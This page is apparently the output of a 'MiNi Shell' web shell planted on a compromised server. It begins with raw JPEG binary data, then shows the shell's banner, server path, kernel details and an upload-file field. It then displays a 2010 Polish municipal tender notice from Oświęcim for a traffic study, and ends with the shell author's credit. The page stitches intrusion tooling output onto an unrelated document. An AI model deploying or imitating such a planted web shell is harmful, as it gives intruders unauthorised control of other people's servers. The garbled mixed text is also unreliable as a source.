JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/143394-N-2010.html

<p class="kh_header"><b>Oświęcim: Opracowanie studium komunikacyjnego na terenie miasta Oświęcim i jego okolicy wraz z uwzględnieniem ewentualnych nowych przepraw mostowych wraz z wykonaniem badania natężenia ruchu</b><br>
<b>Numer ogłoszenia: 143394 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie studium komunikacyjnego na terenie miasta Oświęcim i jego okolicy wraz z uwzględnieniem ewentualnych nowych przepraw mostowych wraz z wykonaniem badania natężenia ruchu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Pozyskiwanie i opracowanie wybranych materiałów wyjściowych w tym:

1. Pozyskanie warstw mapowych:
a) Podkłady mapowe w skali 1:1000 (rastry) w zakresie S osadzone w układzie współrzędnych.
b) Cyfrowy model terenu - DTM (dane numeryczne o terenie w układzie 3D) skorelowany z ortofotomapą miasta w skali 1:12500 - w ramach studium Wykonawca pozyska oba elementy z zasobu wojewódzkiego (geodezja marszałkowska) we własnym zakresie.

2. Pozyskanie elementów GIS-owej bazy danych w zakresie zgeokodowanej bazy zatrudnienia.

Wykonawca pozyska z Wojewódzkiego Urzędu Statystycznego (WUS) dane obejmujące następujący zakres:
- adres,
- nazwa zakładu,
- typ działalności gospodarczej,
- liczba zatrudnionych (wg przedziałów ustalonych przez WUS).
Wykonawca pozyska i opracuje dane WUS we własnym zakresie.

3. Opracowanie warstw mapowych (wektoryzacja) w zakresie sytuacyjnym

a)Plan osiowy dróg tworzących układ podstawowy miasta (do ważniejszych dróg klasy lokalna- szczególnie tych, które prowadzą komunikację zbiorową - włącznie) w układzie współrzędnych przyjętym dla całości opracowania.
b)Warstwa krawędzi dróg i chodników.
c)Warstwa budynków (kubatury) z informacją o ich przeznaczeniu, sposobie użytkowania i liczbie  kondygnacji.

4. Charakterystyka i ocena stanu środowiska przyrodniczego, walorów kulturowych
i krajobrazowych miasta w stanie istniejącym mogących mieć wpływ na rozwój układu drogowego Wykonawca uwzględni m.in.:
a) obszar objęty i planowany do objęcia programem NATURA 2000
b) obszar Starego Miasta objęty nadzorem konserwatorskim
c) teren Państwowego Muzeum KL Auschwitz-Birkenau w Oświęcimiu
d) Program Ochrony Środowiska dla Miasta Oświęcim
e) Zespół Przyrodniczo-Krajobrazowy DOLINA RZEKI SOŁY
f) Gminną Ewidencję Zabytków
g) Strategię Promocji Miasta Oświęcim

B. Wykonanie analiz w tym:

1. Określenie zgodności parametrów technicznych elementów układu drogowego miasta w stanie istniejącym z aktualną klasyfikacją funkcjonalno-techniczną (na podstawie danych pozyskanych u zarządców poszczególnych kategorii dróg).

2. Analizy podstawowych wskaźników demograficznych i komunikacyjnych miasta.

3. Analizy dokumentów planistycznych.

Analizą należy objąć w szczególności:
a)miejscowe plany zagospodarowania przestrzennego MPZP,
b)studium uwarunkowań i kierunków zagospodarowania przestrzennego SuiKZP,
c)Strategię rozwoju miasta Oświęcim na lata 2008 -2013
d)Strategię rozwoju transportu publicznego w Oświęcimiu na lata 2010 - 2013
e)oraz wszystkie opracowania dotyczące rozwoju regionalnego.

4. Prognozy ruchu (wraz z załącznikami graficznymi):
a)Opracowanie modelu ruchu kołowego w stanie istniejącym.
b)Opracowanie zerowej prognozy ruchu (wzrost ruchu przy braku rozwoju układu)
w okresie perspektywicznym (+ 15 lat, tj. na 2025 rok) dla następujących wariantów:
- wariant podstawowy (nie uwzględniający lokalizacji centrum handlowo-usługowo-administracyjnego pomiędzy ul. Bulwary, ul. Berka Joselewicza a ul. Dąbrowskiego wraz z zamknięciem Rynku Głównego dla ruchu kołowego i przebudową kładki pieszo-jezdnej w ciągu ul. Cichej na most drogowy o ruchu dwukierunkowym),
- wariant uwzględniający lokalizację centrum handlowo-usługowo-administracyjnego pomiędzy ul. Bulwary, ul. Berka Joselewicza a ul. Dąbrowskiego wraz z zamknięciem Rynku Głównego dla ruchu kołowego i przebudową kładki pieszo-jezdnej w ciągu ul. Cichej na most drogowy o ruchu dwukierunkowym,
c)Opracowanie wariantowej prognozy ruchu rozwoju układu drogowego miasta na okres perspektywiczny w szczególności dla następujących wariantów:
- wariant rozwoju układu drogowego uwzględniający realizację wszystkich zamierzeń określonych w dokumentach planistycznych,
- wariant rozwoju układu drogowego uwzględniający realizację wszystkich zamierzeń określonych w dokumentach planistycznych oraz lokalizację centrum handlowo-usługowo-administracyjnego pomiędzy ul. Bulwary, ul. Berka Joselewicza a ul. Dąbrowskiego wraz z zamknięciem Rynku Głównego dla ruchu kołowego i przebudową kładki pieszo-jezdnej w ciągu ul. Cichej na most drogowy o ruchu dwukierunkowym,
- wariant autorski rozwoju układu drogowego oparty na dokumentach planistycznych, uwzględniający zaproponowane przez Wykonawcę rozwiązanie słabych stron istniejącego układu komunikacyjnego,
d)Analiza przepustowości układu drogowego miasta na poszczególnych etapach opracowania prognozy ruchu.

Prognozy ruchu należy wykonać metodą modelowania.

5. Koszty rozwoju układu
Opracowanie uproszonych (wskaźnikowych) kosztów realizacji poszczególnych elementów rozwoju układu drogowego miasta.

6. Analizy efektywności ekonomicznej
Opracowanie analizy efektywności ekonomicznej przyjętych wariantowych rozwiązań rozwoju układu drogowego miasta.

7. Analizy oddziaływania planowanego rozwoju sieci drogowej na środowisko

a) Ocena wrażliwości środowiska	
b) Analizy przestrzenne emisji zanieczyszczeń odkomunikacyjnych
c) Ocena emisji zagrożeń odkomunikacyjnych

8. Hałasu drogowego

a) Wykonanie map hałasu prezentujących rozkład pola akustycznego dla wytypowanych odcinków dróg w oparciu o model 3D terenu w stanie istniejącym:
- mapa emisyjna,
- mapa imisyjna,
- mapa przekroczeń,
- mapa narażenia ludności.
b) Wykonanie mapy hałasu prezentujących rozkład pola akustycznego dla wersji rozwoju układu drogowego w mieście.
c) Opracowanie analizy porównawczej oddziaływania hałasu dla wersji rozwoju układu drogowego w mieście w odniesieniu do stanu istniejącego.

C. Opracowanie części wynikowej studium w tym:
a)Uwarunkowania przyrodnicze, kulturowe i krajobrazowe dotyczące realizacji poszczególnych elementów rozwojowych układu drogowego miasta.
b)Opracowanie na podstawie analiz: ruchu, kosztów, efektywności ekonomicznej oraz zagadnień ekologicznych zoptymalizowanego scenariusza rozbudowy układu drogowego miasta w okresie perspektywicznym (do 2025 roku) z uwzględnieniem etapowania jego rozwoju.
c)Weryfikacja aktualnie planowanych przez Zamawiającego zamierzeń inwestycyjnych oraz sugestie pod adresem innych Zarządców dróg na terenie miasta..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.12.00-3, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w przedmiotowym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie w okresie ostatnich 3 lat co najmniej jednego studium komunikacyjnego miasta o liczbie mieszkańców nie mniejszej niż 50 tys.

Opis sposobu oceny spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzęd Miasta Oświęcim, Wydział Zamów8ień Publicznych,  ul. Solskiego 2, pok. 11, 32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 10:00, miejsce: Oferta powinna być złożona w Urzędzie Miasta Oświęcim, ul. Zaborska 2, pok. 1, 32-600 Oświęcim.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com